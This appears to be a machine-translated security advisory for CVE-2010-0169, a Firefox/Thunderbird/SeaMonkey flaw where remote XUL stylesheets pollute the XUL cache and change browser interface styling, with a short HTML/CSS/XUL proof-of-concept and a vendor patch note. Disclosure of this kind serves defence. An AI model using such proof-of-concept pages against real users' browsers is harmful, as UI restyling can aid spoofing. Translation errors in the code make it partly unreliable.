Mozilla Firefox cache XUL style sheet modification browser UI Vulnerability

Affected Versions:
Mozilla Firefox 3.6.
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
Mozilla Thunderbird 3.0
Mozilla SeaMonkey 2.0 vulnerability description:
Bugtraq id: 38922
CVE (CAN) ID: CVE-2010-0169

Firefox is a popular open-source WEB browser.

The style sheet used by remote XUL documents may pollute the XUL cache, And the browser Chrome will use this cache to determine the style of the user interface. Malicious websites can exploit this vulnerability to change the style attributes of browsers, such as the font size and color. <* Reference
Http://secunia.com/advisories/38608/
Http://www.mozilla.org/security/announce/2010/mfsa2010-14.html
*>
Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! Test.html:
<Link rel = "stylesheet" href = "test.css" type = "text/css">
<Iframe src = "test. xul"> </iframe>

Test.css:
Label {
Color: red;
}
Label [someAttr] {
Color: green;
}

Test. xul:
<? Xml-stylesheet href = "test.css" type = "text/css"?>
<Page xmlns = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<Label someAttr = "true" value = "This shocould be green"/>
</Page> SEBUG Security suggestions:
Vendor patch:

Mozilla
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.mozilla.org ///